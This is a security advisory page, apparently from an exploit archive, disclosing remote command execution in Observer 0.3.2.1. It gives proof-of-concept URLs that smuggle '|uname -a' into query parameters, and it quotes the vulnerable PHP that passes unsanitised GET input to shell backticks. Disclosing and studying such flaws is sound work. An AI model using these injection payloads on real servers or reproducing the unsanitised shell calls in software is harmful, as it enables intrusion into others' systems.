Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities

2008.10.01
Credit: dun
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ######################################################### # [ observer <= 0.3.2.1 ] Remote Command Execution # ######################################################### # # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks." # # Script site: http://www.project-observer.org/ # Download: http://freshmeat.net/projects/observer/ # # Vuln: # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a # # # Bug(1): ./observer-0.3.2.1/html/whois.php # # ... # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; # $output = trim($output); # echo("<pre>$output</pre>"); # ... # # # Bug(2): ./observer-0.3.2.1/html/netcmd.php # # ... # switch ($_GET[cmd]) { # case 'whois': # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; # break; # case 'ping': # $output = `/bin/ping $_GET[query]`; # break; # case 'tracert': # $output = `/usr/sbin/traceroute $_GET[query]`; # break; # case 'nmap': # $output = `/usr/bin/nmap $_GET[query]`; # break; # } # $output = trim($output); # echo("<pre>$output</pre>"); # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] *******************************************************************************************

References:

http://xforce.iss.net/xforce/xfdb/45398


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top